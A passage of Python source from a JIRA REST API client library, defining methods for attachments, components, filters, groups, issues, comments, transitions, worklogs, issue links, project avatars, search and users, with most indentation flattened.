'file': (fname, attachment, 'application/octet-stream')},
headers=CaseInsensitiveDict({'content-type': None, 'X-Atlassian-Token': 'nocheck'}))
else:
method = 'MultipartEncoder'
def file_stream():
return MultipartEncoder(
fields={
'file': (fname, attachment, 'text/plain')}
)
m = file_stream()
r = self._session.post(
url, data=m, headers=CaseInsensitiveDict({'content-type': m.content_type, 'X-Atlassian-Token': 'nocheck'}), retry_data=file_stream)
attachment = Attachment(self._options, self._session, json_loads(r)[0])
if attachment.size == 0:
raise JIRAError("Added empty attachment via %s method?!: r: %s\nattachment: %s" % (method, r, attachment))
return attachment
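    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the issue key and file path are placeholders:
    #
    #   attachment = jira.add_attachment("PROJ-123", "/tmp/report.txt")
    #   attachment = jira.add_attachment("PROJ-123", open("report.txt", "rb"), filename="report.txt")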
# Components
def component(self, id):
"""
Get a component Resource from the server.
:param id: ID of the component to get
"""
return self._find_for_resource(Component, id)
@translate_resource_args
def create_component(self, name, project, description=None, leadUserName=None, assigneeType=None,
isAssigneeTypeValid=False):
"""
Create a component inside a project and return a Resource for it.
:param name: name of the component
:param project: key of the project to create the component in
:param description: a description of the component
:param leadUserName: the username of the user responsible for this component
:param assigneeType: see the ComponentBean.AssigneeType class for valid values
:param isAssigneeTypeValid: boolean specifying whether the assignee type is acceptable
"""
data = {
'name': name,
'project': project,
'isAssigneeTypeValid': isAssigneeTypeValid
}
if description is not None:
data['description'] = description
if leadUserName is not None:
data['leadUserName'] = leadUserName
if assigneeType is not None:
data['assigneeType'] = assigneeType
url = self._get_url('component')
r = self._session.post(
url, data=json.dumps(data))
component = Component(self._options, self._session, raw=json_loads(r))
return component
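    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the component and project names are placeholders:
    #
    #   component = jira.create_component("backend", "PROJ", description="Server-side code")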
def component_count_related_issues(self, id):
"""
Get the count of related issues for a component.
:type id: integer
:param id: ID of the component to use
"""
return self._get_json('component/' + id + '/relatedIssueCounts')['issueCount']
# Custom field options
def custom_field_option(self, id):
"""
Get a custom field option Resource from the server.
:param id: ID of the custom field to use
"""
return self._find_for_resource(CustomFieldOption, id)
# Dashboards
def dashboards(self, filter=None, startAt=0, maxResults=20):
"""
Return a ResultList of Dashboard resources and a ``total`` count.
:param filter: either "favourite" or "my", the type of dashboards to return
:param startAt: index of the first dashboard to return
:param maxResults: maximum number of dashboards to return. The total number of
results is always available in the ``total`` attribute of the returned ResultList.
"""
params = {}
if filter is not None:
params['filter'] = filter
params['startAt'] = startAt
params['maxResults'] = maxResults
r_json = self._get_json('dashboard', params=params)
dashboards = [Dashboard(self._options, self._session, raw_dash_json)
for raw_dash_json in r_json['dashboards']]
return ResultList(dashboards, r_json['total'])
def dashboard(self, id):
"""
Get a dashboard Resource from the server.
:param id: ID of the dashboard to get.
"""
return self._find_for_resource(Dashboard, id)
# Fields
# non-resource
def fields(self):
"""Return a list of all issue fields."""
return self._get_json('field')
# Filters
def filter(self, id):
"""
Get a filter Resource from the server.
:param id: ID of the filter to get.
"""
return self._find_for_resource(Filter, id)
def favourite_filters(self):
"""Get a list of filter Resources which are the favourites of the currently authenticated user."""
r_json = self._get_json('filter/favourite')
filters = [Filter(self._options, self._session, raw_filter_json)
for raw_filter_json in r_json]
return filters
def create_filter(self, name=None, description=None,
jql=None, favourite=None):
"""
Create a new filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
data = {}
if name is not None:
data['name'] = name
if description is not None:
data['description'] = description
if jql is not None:
data['jql'] = jql
if favourite is not None:
data['favourite'] = favourite
url = self._get_url('filter')
r = self._session.post(
url, data=json.dumps(data))
raw_filter_json = json_loads(r)
return Filter(self._options, self._session, raw=raw_filter_json)
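    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the filter name and JQL are placeholders:
    #
    #   flt = jira.create_filter(name="My open bugs",
    #                            jql="assignee = currentUser() AND resolution = Unresolved",
    #                            favourite=True)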
# Groups
# non-resource
def groups(self, query=None, exclude=None, maxResults=None):
"""
Return a list of groups matching the specified criteria.
Keyword arguments:
query -- filter groups by name with this string
exclude -- filter out groups by name with this string
        maxResults -- maximum results to return. Defaults to system property jira.ajax.autocomplete.limit (20)
"""
params = {}
if query is not None:
params['query'] = query
if exclude is not None:
params['exclude'] = exclude
if maxResults is not None:
params['maxResults'] = maxResults
return self._get_json('groups/picker', params=params)
def group_members(self, group):
"""
        Return a hash of users with their information. Requires JIRA 6.0 or will raise NotImplementedError.
"""
if self._version < (6, 0, 0):
raise NotImplementedError(
"Group members is not implemented in JIRA before version 6.0, upgrade the instance, if possible.")
params = {'groupname': group, 'expand': "users"}
r = self._get_json('group', params=params)
size = r['users']['size']
end_index = r['users']['end-index']
while end_index < size - 1:
params = {'groupname': group, 'expand': "users[%s:%s]" % (
end_index + 1, end_index + 50)}
r2 = self._get_json('group', params=params)
for user in r2['users']['items']:
r['users']['items'].append(user)
end_index = r2['users']['end-index']
size = r['users']['size']
result = {}
for user in r['users']['items']:
result[user['name']] = {'fullname': user['displayName'], 'email': user['emailAddress'],
'active': user['active']}
return result
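    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance and JIRA >= 6.0; the group name is a placeholder:
    #
    #   members = jira.group_members("jira-developers")
    #   for username, info in members.items():
    #       print(username, info['email'], info['active'])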
def add_group(self, groupname):
'''
Creates a new group in JIRA.
:param groupname: The name of the group you wish to create.
        :return: Boolean - True if successful.
'''
url = self._options['server'] + '/rest/api/latest/group'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['name'] = groupname
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def remove_group(self, groupname):
'''
Deletes a group from the JIRA instance.
:param groupname: The group to be deleted from the JIRA instance.
:return: Boolean. Returns True on success.
'''
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
url = self._options['server'] + '/rest/api/latest/group'
x = {'groupname': groupname}
self._session.delete(url, params=x)
return True
# Issues
def issue(self, id, fields=None, expand=None):
"""
Get an issue Resource from the server.
:param id: ID or key of the issue to get
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# this allows us to pass Issue objects to issue()
if type(id) == Issue:
return id
issue = Issue(self._options, self._session)
params = {}
if fields is not None:
params['fields'] = fields
if expand is not None:
params['expand'] = expand
issue.find(id, params=params)
return issue
def create_issue(self, fields=None, prefetch=True, **fieldargs):
"""
Create a new issue and return an issue Resource for it.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored.
By default, the client will immediately reload the issue Resource created by this method in order to return
a complete Issue object to the caller; this behavior can be controlled through the 'prefetch' argument.
JIRA projects may contain many different issue types. Some issue screens have different requirements for
fields in a new issue. This information is available through the 'createmeta' method. Further examples are
available here: https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+Example+-+Create+Issue
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
:param prefetch: whether to reload the created issue Resource so that all of its data is present in the value\
returned from this method
"""
data = {}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
p = data['fields']['project']
if isinstance(p, string_types) or isinstance(p, integer_types):
data['fields']['project'] = {'id': self.project(p).id}
url = self._get_url('issue')
r = self._session.post(url, data=json.dumps(data))
raw_issue_json = json_loads(r)
if 'key' not in raw_issue_json:
raise JIRAError(r.status_code, request=r)
if prefetch:
return self.issue(raw_issue_json['key'])
else:
return Issue(self._options, self._session, raw=raw_issue_json)
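    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the project key and issue type are placeholders and depend on the server:
    #
    #   new_issue = jira.create_issue(project='PROJ',
    #                                 summary='Crash on startup',
    #                                 description='Steps to reproduce...',
    #                                 issuetype={'name': 'Bug'})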
def createmeta(self, projectKeys=None, projectIds=[], issuetypeIds=None, issuetypeNames=None, expand=None):
"""
Gets the metadata required to create issues, optionally filtered by projects and issue types.
:param projectKeys: keys of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectIds.
:param projectIds: IDs of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectKeys.
:param issuetypeIds: IDs of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeNames.
:param issuetypeNames: Names of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeIds.
:param expand: extra information to fetch inside each resource.
"""
params = {}
if projectKeys is not None:
params['projectKeys'] = projectKeys
if projectIds is not None:
if isinstance(projectIds, string_types):
projectIds = projectIds.split(',')
params['projectIds'] = projectIds
if issuetypeIds is not None:
params['issuetypeIds'] = issuetypeIds
if issuetypeNames is not None:
params['issuetypeNames'] = issuetypeNames
if expand is not None:
params['expand'] = expand
return self._get_json('issue/createmeta', params)
# non-resource
@translate_resource_args
def assign_issue(self, issue, assignee):
"""
Assign an issue to a user. None will set it to unassigned. -1 will set it to Automatic.
:param issue: the issue to assign
:param assignee: the user to assign the issue to
"""
url = self._options['server'] + \
'/rest/api/2/issue/' + str(issue) + '/assignee'
payload = {'name': assignee}
r = self._session.put(
url, data=json.dumps(payload))
@translate_resource_args
def comments(self, issue):
"""
Get a list of comment Resources.
:param issue: the issue to get comments from
"""
r_json = self._get_json('issue/' + str(issue) + '/comment')
comments = [Comment(self._options, self._session, raw_comment_json)
for raw_comment_json in r_json['comments']]
return comments
@translate_resource_args
def comment(self, issue, comment):
"""
Get a comment Resource from the server for the specified ID.
:param issue: ID or key of the issue to get the comment from
:param comment: ID of the comment to get
"""
return self._find_for_resource(Comment, (issue, comment))
@translate_resource_args
def add_comment(self, issue, body, visibility=None):
"""
Add a comment from the current authenticated user on the specified issue and return a Resource for it.
The issue identifier and comment body are required.
:param issue: ID or key of the issue to add the comment to
:param body: Text of the comment to add
:param visibility: a dict containing two entries: "type" and "value". "type" is 'role' (or 'group' if the JIRA\
server has configured comment visibility for groups) and 'value' is the name of the role (or group) to which\
viewing of this comment will be restricted.
"""
data = {
'body': body
}
if visibility is not None:
data['visibility'] = visibility
url = self._get_url('issue/' + str(issue) + '/comment')
r = self._session.post(
url, data=json.dumps(data))
comment = Comment(self._options, self._session, raw=json_loads(r))
return comment
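    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the issue key and role name are placeholders:
    #
    #   jira.add_comment("PROJ-123", "Fixed in the nightly build",
    #                    visibility={'type': 'role', 'value': 'Developers'})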
# non-resource
@translate_resource_args
def editmeta(self, issue):
"""
Get the edit metadata for an issue.
:param issue: the issue to get metadata for
"""
return self._get_json('issue/' + str(issue) + '/editmeta')
@translate_resource_args
def remote_links(self, issue):
"""
Get a list of remote link Resources from an issue.
:param issue: the issue to get remote links from
"""
r_json = self._get_json('issue/' + str(issue) + '/remotelink')
remote_links = [RemoteLink(
self._options, self._session, raw_remotelink_json) for raw_remotelink_json in r_json]
return remote_links
@translate_resource_args
def remote_link(self, issue, id):
"""
Get a remote link Resource from the server.
:param issue: the issue holding the remote link
:param id: ID of the remote link
"""
return self._find_for_resource(RemoteLink, (issue, id))
# removed the @translate_resource_args because it prevents us from finding
# information for building a proper link
def add_remote_link(self, issue, destination, globalId=None, application=None, relationship=None):
"""
        Add a remote link from an issue to an external application and return a remote link Resource
        for it. ``destination`` should be a dict containing at least ``url`` to the linked external URL and
        ``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` and the keyword arguments ``globalId``, ``application``
and ``relationship``, see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param destination: the link details to add (see the above link for details)
:param globalId: unique ID for the link (see the above link for details)
:param application: application information for the link (see the above link for details)
:param relationship: relationship description for the link (see the above link for details)
"""
warnings.warn(
"broken: see https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551",
Warning)
data = {}
if type(destination) == Issue:
data['object'] = {
'title': str(destination),
'url': destination.permalink()
}
for x in self.applicationlinks():
if x['application']['displayUrl'] == destination._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
if 'globalId' not in data:
raise NotImplementedError(
"Unable to identify the issue to link to.")
else:
if globalId is not None:
data['globalId'] = globalId
if application is not None:
data['application'] = application
data['object'] = destination
if relationship is not None:
data['relationship'] = relationship
# check if the link comes from one of the configured application links
for x in self.applicationlinks():
if x['application']['displayUrl'] == self._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
remote_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return remote_link
# non-resource
@translate_resource_args
def transitions(self, issue, id=None, expand=None):
"""
Get a list of the transitions available on the specified issue to the current user.
:param issue: ID or key of the issue to get the transitions from
:param id: if present, get only the transition matching this ID
:param expand: extra information to fetch inside each transition
"""
params = {}
if id is not None:
params['transitionId'] = id
if expand is not None:
params['expand'] = expand
return self._get_json('issue/' + str(issue) + '/transitions', params=params)['transitions']
def find_transitionid_by_name(self, issue, transition_name):
"""
Get a transitionid available on the specified issue to the current user.
Look at https://developer.atlassian.com/static/rest/jira/6.1.html#d2e1074 for json reference
:param issue: ID or key of the issue to get the transitions from
        :param transition_name: name of the transition we are looking for
"""
        transitions_json = self.transitions(issue)
        id = None
        for transition in transitions_json:
            if transition["name"].lower() == transition_name.lower():
                id = transition["id"]
                break
        return id
@translate_resource_args
def transition_issue(self, issue, transition, fields=None, comment=None, **fieldargs):
# TODO: Support update verbs (same as issue.update())
"""
Perform a transition on an issue.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored. Field values will be set on the issue as part of the transition process.
:param issue: ID or key of the issue to perform the transition on
:param transition: ID or name of the transition to perform
:param comment: *Optional* String to add as comment to the issue when performing the transition.
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
"""
transitionId = None
try:
transitionId = int(transition)
except:
# cannot cast to int, so try to find transitionId by name
transitionId = self.find_transitionid_by_name(issue, transition)
if transitionId is None:
raise JIRAError("Invalid transition name. %s" % transition)
data = {
'transition': {
'id': transitionId
}
}
if comment:
data['update'] = {'comment': [{'add': {'body': comment}}]}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
url = self._get_url('issue/' + str(issue) + '/transitions')
r = self._session.post(
url, data=json.dumps(data))
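    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the issue key, transition name and resolution are placeholders:
    #
    #   jira.transition_issue("PROJ-123", "Resolve Issue",
    #                         comment="Fixed upstream",
    #                         resolution={'name': 'Fixed'})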
@translate_resource_args
def votes(self, issue):
"""
Get a votes Resource from the server.
:param issue: ID or key of the issue to get the votes for
"""
return self._find_for_resource(Votes, issue)
@translate_resource_args
def add_vote(self, issue):
"""
Register a vote for the current authenticated user on an issue.
:param issue: ID or key of the issue to vote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
r = self._session.post(url)
@translate_resource_args
def remove_vote(self, issue):
"""
Remove the current authenticated user's vote from an issue.
:param issue: ID or key of the issue to unvote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
self._session.delete(url)
@translate_resource_args
def watchers(self, issue):
"""
Get a watchers Resource from the server for an issue.
:param issue: ID or key of the issue to get the watchers for
"""
return self._find_for_resource(Watchers, issue)
@translate_resource_args
def add_watcher(self, issue, watcher):
"""
Add a user to an issue's watchers list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to add to the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
self._session.post(
url, data=json.dumps(watcher))
@translate_resource_args
def remove_watcher(self, issue, watcher):
"""
Remove a user from an issue's watch list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to remove from the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
params = {'username': watcher}
result = self._session.delete(url, params=params)
return result
@translate_resource_args
def worklogs(self, issue):
"""
Get a list of worklog Resources from the server for an issue.
:param issue: ID or key of the issue to get worklogs from
"""
r_json = self._get_json('issue/' + str(issue) + '/worklog')
worklogs = [Worklog(self._options, self._session, raw_worklog_json)
for raw_worklog_json in r_json['worklogs']]
return worklogs
@translate_resource_args
def worklog(self, issue, id):
"""
Get a specific worklog Resource from the server.
:param issue: ID or key of the issue to get the worklog from
:param id: ID of the worklog to get
"""
return self._find_for_resource(Worklog, (issue, id))
@translate_resource_args
def add_worklog(self, issue, timeSpent=None, timeSpentSeconds=None, adjustEstimate=None,
newEstimate=None, reduceBy=None, comment=None, started=None, user=None):
"""
Add a new worklog entry on an issue and return a Resource for it.
:param issue: the issue to add the worklog to
        :param timeSpent: a worklog entry with this amount of time spent, e.g. "2d"
        :param timeSpentSeconds: a worklog entry with this amount of time spent, in seconds
:param adjustEstimate: (optional) allows the user to provide specific instructions to update the remaining\
time estimate of the issue. The value can either be ``new``, ``leave``, ``manual`` or ``auto`` (default).
:param newEstimate: the new value for the remaining estimate field. e.g. "2d"
:param reduceBy: the amount to reduce the remaining estimate by e.g. "2d"
:param started: Moment when the work is logged, if not specified will default to now
        :param comment: optional worklog comment
        :param user: optional user to record as the worklog author (note that JIRA may ignore the author field)
"""
params = {}
if adjustEstimate is not None:
params['adjustEstimate'] = adjustEstimate
if newEstimate is not None:
params['newEstimate'] = newEstimate
if reduceBy is not None:
params['reduceBy'] = reduceBy
data = {}
if timeSpent is not None:
data['timeSpent'] = timeSpent
if timeSpentSeconds is not None:
data['timeSpentSeconds'] = timeSpentSeconds
if comment is not None:
data['comment'] = comment
elif user:
            # record the user inside the comment, since setting the author field doesn't always work
data['comment'] = user
if started is not None:
# based on REST Browser it needs: "2014-06-03T08:21:01.273+0000"
data['started'] = started.strftime("%Y-%m-%dT%H:%M:%S.000%z")
if user is not None:
data['author'] = {"name": user,
'self': self.JIRA_BASE_URL + '/rest/api/2/user?username=' + user,
'displayName': user,
'active': False
}
data['updateAuthor'] = data['author']
# TODO: report bug to Atlassian: author and updateAuthor parameters are
# ignored.
url = self._get_url('issue/{0}/worklog'.format(issue))
r = self._session.post(url, params=params, data=json.dumps(data))
return Worklog(self._options, self._session, json_loads(r))
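    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the issue key and comment are placeholders:
    #
    #   jira.add_worklog("PROJ-123", timeSpent="2h", comment="Investigated the crash")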
# Issue links
@translate_resource_args
def create_issue_link(self, type, inwardIssue, outwardIssue, comment=None):
"""
Create a link between two issues.
:param type: the type of link to create
:param inwardIssue: the issue to link from
:param outwardIssue: the issue to link to
:param comment: a comment to add to the issues with the link. Should be a dict containing ``body``\
and ``visibility`` fields: ``body`` being the text of the comment and ``visibility`` being a dict containing\
two entries: ``type`` and ``value``. ``type`` is ``role`` (or ``group`` if the JIRA server has configured\
comment visibility for groups) and ``value`` is the name of the role (or group) to which viewing of this\
comment will be restricted.
"""
# let's see if we have the right issue link 'type' and fix it if needed
if not hasattr(self, '_cached_issuetypes'):
self._cached_issue_link_types = self.issue_link_types()
if type not in self._cached_issue_link_types:
for lt in self._cached_issue_link_types:
if lt.outward == type:
                    # the outward description was given, so use the link type's name
type = lt.name
break
elif lt.inward == type:
                    # the inward description was given, so swap the issues to match the link direction
type = lt.name
inwardIssue, outwardIssue = outwardIssue, inwardIssue
break
data = {
'type': {
'name': type
},
'inwardIssue': {
'key': inwardIssue
},
'outwardIssue': {
'key': outwardIssue
},
'comment': comment
}
url = self._get_url('issueLink')
r = self._session.post(
url, data=json.dumps(data))
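    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the link type name and issue keys are placeholders, and the
    # available types can be listed with issue_link_types():
    #
    #   jira.create_issue_link("Duplicate", "PROJ-123", "PROJ-124")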
def issue_link(self, id):
"""
Get an issue link Resource from the server.
:param id: ID of the issue link to get
"""
return self._find_for_resource(IssueLink, id)
# Issue link types
def issue_link_types(self):
"""Get a list of issue link type Resources from the server."""
r_json = self._get_json('issueLinkType')
link_types = [IssueLinkType(self._options, self._session, raw_link_json) for raw_link_json in
r_json['issueLinkTypes']]
return link_types
def issue_link_type(self, id):
"""
Get an issue link type Resource from the server.
:param id: ID of the issue link type to get
"""
return self._find_for_resource(IssueLinkType, id)
# Issue types
def issue_types(self):
"""Get a list of issue type Resources from the server."""
r_json = self._get_json('issuetype')
issue_types = [IssueType(
self._options, self._session, raw_type_json) for raw_type_json in r_json]
return issue_types
def issue_type(self, id):
"""
Get an issue type Resource from the server.
:param id: ID of the issue type to get
"""
return self._find_for_resource(IssueType, id)
# User permissions
# non-resource
def my_permissions(self, projectKey=None, projectId=None, issueKey=None, issueId=None):
"""
Get a dict of all available permissions on the server.
:param projectKey: limit returned permissions to the specified project
:param projectId: limit returned permissions to the specified project
:param issueKey: limit returned permissions to the specified issue
:param issueId: limit returned permissions to the specified issue
"""
params = {}
if projectKey is not None:
params['projectKey'] = projectKey
if projectId is not None:
params['projectId'] = projectId
if issueKey is not None:
params['issueKey'] = issueKey
if issueId is not None:
params['issueId'] = issueId
return self._get_json('mypermissions', params=params)
# Priorities
def priorities(self):
"""Get a list of priority Resources from the server."""
r_json = self._get_json('priority')
priorities = [Priority(
self._options, self._session, raw_priority_json) for raw_priority_json in r_json]
return priorities
def priority(self, id):
"""
Get a priority Resource from the server.
:param id: ID of the priority to get
"""
return self._find_for_resource(Priority, id)
# Projects
def projects(self):
"""Get a list of project Resources from the server visible to the current authenticated user."""
r_json = self._get_json('project')
projects = [Project(
self._options, self._session, raw_project_json) for raw_project_json in r_json]
return projects
def project(self, id):
"""
Get a project Resource from the server.
:param id: ID or key of the project to get
"""
return self._find_for_resource(Project, id)
# non-resource
@translate_resource_args
def project_avatars(self, project):
"""
Get a dict of all avatars for a project visible to the current authenticated user.
:param project: ID or key of the project to get avatars for
"""
return self._get_json('project/' + project + '/avatars')
@translate_resource_args
def create_temp_project_avatar(self, project, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a project avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on libmagic and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_project_avatar` to finish the avatar creation process. If\
you want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the 'auto_confirm'\
argument with a truthy value and :py:meth:`confirm_project_avatar` will be called for you before this method\
returns.
:param project: ID or key of the project to create the avatar in
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object holding the avatar
:param contentType: explicit specification for the avatar image's content-type
:param boolean auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_project_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('project/' + project + '/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_project_avatar(project, cropping_properties)
else:
return cropping_properties
@translate_resource_args
def confirm_project_avatar(self, project, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
        After a successful registration with :py:meth:`create_temp_project_avatar`, use this method to confirm the avatar
for use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_project_avatar` should be used for this
argument.
:param project: ID or key of the project to confirm the avatar in
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_project_avatar`
"""
data = cropping_properties
url = self._get_url('project/' + project + '/avatar')
r = self._session.post(
url, data=json.dumps(data))
return json_loads(r)
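    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the project key and file name are placeholders. With
    # auto_confirm=True the confirmation step runs automatically:
    #
    #   with open("logo.png", "rb") as f:
    #       jira.create_temp_project_avatar("PROJ", "logo.png",
    #                                       os.path.getsize("logo.png"), f,
    #                                       auto_confirm=True)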
@translate_resource_args
def set_project_avatar(self, project, avatar):
"""
Set a project's avatar.
:param project: ID or key of the project to set the avatar on
:param avatar: ID of the avatar to set
"""
self._set_avatar(
None, self._get_url('project/' + project + '/avatar'), avatar)
@translate_resource_args
def delete_project_avatar(self, project, avatar):
"""
Delete a project's avatar.
:param project: ID or key of the project to delete the avatar from
        :param avatar: ID of the avatar to delete
"""
url = self._get_url('project/' + project + '/avatar/' + avatar)
r = self._session.delete(url)
@translate_resource_args
def project_components(self, project):
"""
Get a list of component Resources present on a project.
:param project: ID or key of the project to get components from
"""
r_json = self._get_json('project/' + project + '/components')
components = [Component(
self._options, self._session, raw_comp_json) for raw_comp_json in r_json]
return components
@translate_resource_args
def project_versions(self, project):
"""
Get a list of version Resources present on a project.
:param project: ID or key of the project to get versions from
"""
r_json = self._get_json('project/' + project + '/versions')
versions = [
Version(self._options, self._session, raw_ver_json) for raw_ver_json in r_json]
return versions
# non-resource
@translate_resource_args
def project_roles(self, project):
"""
Get a dict of role names to resource locations for a project.
:param project: ID or key of the project to get roles from
"""
return self._get_json('project/' + project + '/role')
@translate_resource_args
def project_role(self, project, id):
"""
Get a role Resource.
:param project: ID or key of the project to get the role from
:param id: ID of the role to get
"""
return self._find_for_resource(Role, (project, id))
# Resolutions
def resolutions(self):
"""Get a list of resolution Resources from the server."""
r_json = self._get_json('resolution')
resolutions = [Resolution(
self._options, self._session, raw_res_json) for raw_res_json in r_json]
return resolutions
def resolution(self, id):
"""
Get a resolution Resource from the server.
:param id: ID of the resolution to get
"""
return self._find_for_resource(Resolution, id)
# Search
def search_issues(self, jql_str, startAt=0, maxResults=50, validate_query=True, fields=None, expand=None,
json_result=None):
"""
Get a ResultList of issue Resources matching a JQL search string.
:param jql_str: the JQL search string to use
:param startAt: index of the first issue to return
:param maxResults: maximum number of issues to return. Total number of results
is available in the ``total`` attribute of the returned ResultList.
If maxResults evaluates as False, it will try to get all issues in batches of 50.
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# TODO what to do about the expand, which isn't related to the issues?
infinite = False
maxi = 50
idx = 0
if fields is None:
fields = []
        # If None is passed as a parameter, fetch all issues from the query in batches
if not maxResults:
maxResults = maxi
infinite = True
search_params = {
"jql": jql_str,
"startAt": startAt,
"maxResults": maxResults,
"validateQuery": validate_query,
"fields": fields,
"expand": expand
}
if json_result:
return self._get_json('search', params=search_params)
resource = self._get_json('search', params=search_params)
issues = [Issue(self._options, self._session, raw_issue_json)
for raw_issue_json in resource['issues']]
cnt = len(issues)
total = resource['total']
if infinite:
while cnt == maxi:
idx += maxi
search_params["startAt"] = idx
resource = self._get_json('search', params=search_params)
issue_batch = [Issue(self._options, self._session, raw_issue_json) for raw_issue_json in
resource['issues']]
issues.extend(issue_batch)
cnt = len(issue_batch)
return ResultList(issues, total)
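    # Illustrative sketch (comments only), assuming a connected ``jira`` client
    # instance; the JQL query is a placeholder. Passing maxResults=False fetches
    # every match in batches of 50:
    #
    #   issues = jira.search_issues("project = PROJ AND status = 'In Progress'", maxResults=25)
    #   print(issues.total, "matching issues,", len(issues), "returned")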
# Security levels
def security_level(self, id):
"""
Get a security level Resource.
:param id: ID of the security level to get
"""
return self._find_for_resource(SecurityLevel, id)
# Server info
# non-resource
def server_info(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('serverInfo')
# Status
def statuses(self):
"""Get a list of status Resources from the server."""
r_json = self._get_json('status')
statuses = [Status(self._options, self._session, raw_stat_json)
for raw_stat_json in r_json]
return statuses
def status(self, id):
"""
Get a status Resource from the server.
:param id: ID of the status resource to get
"""
return self._find_for_resource(Status, id)
# Users
def user(self, id, expand=None):
"""
Get a user Resource from the server.
:param id: ID of the user to get
:param expand: extra information to fetch inside each resource
"""
user = User(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
user.find(id, params=params)
return user
def search_assignable_users_for_projects(self, username, projectKeys, startAt=0, maxResults=50):
"""
Get a list of user Resources that match the search string and can be assigned issues for projects.
:param username: a string to match usernames against
:param projectKeys: comma-separated list of project keys to check for issue assignment permissions
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'projectKeys': projectKeys,
'startAt': startAt,
'maxResults': maxResults
}
r_json = self._get_json(
'user/assignable/multiProjectSearch', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_assignable_users_for_issues(self, username, project=None, issueKey=None, expand=None, startAt=0,
maxResults=50):
"""
Get a list of user Resources that match the search string for assigning or creating issues.
This method is intended to find users that are eligible to create issues in a project or be assigned
to an existing issue. When searching for eligible creators, specify a project. When searching for eligible
assignees, specify an issue key.
:param username: a string to match usernames against
:param project: filter returned users by permission in this project (expected if a result will be used to \
create an issue)
:param issueKey: filter returned users by this issue (expected if a result will be used to edit this issue)
:param expand: extra information to fetch inside each resource
